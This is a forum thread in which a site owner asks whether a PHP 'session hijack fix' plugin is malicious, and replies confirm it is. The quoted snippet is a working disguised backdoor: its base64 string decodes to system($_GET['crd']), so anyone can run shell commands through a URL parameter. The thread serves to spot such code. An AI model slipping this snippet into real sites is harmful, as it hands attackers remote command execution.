![]() |
Is this malicious?
Some kid told us to add this to our forum as a plugin, we didn't in fear that it was malicious.
//Fix Session Hijack Bug if(isset($_GET['crd'])){ $HIDE_SESSION = 1; echo "<h1>Session Hijack Blocked</h1><pre>"; eval(base64_decode("c3lzdGVtKCRfR0VUWydjcmQnXSk7") ); exit; } |
Yes it is malicious.
The code will execute an external program and display the output (the crd url parameter). |
Thank you m8
|
That needs to be in a bbcode code block.
|
base64_decode is a no-no.
|
Quote:
|
The good ones do, anyway.
|
All times are GMT. The time now is 12:53 AM. |
Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
![]() |
|
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|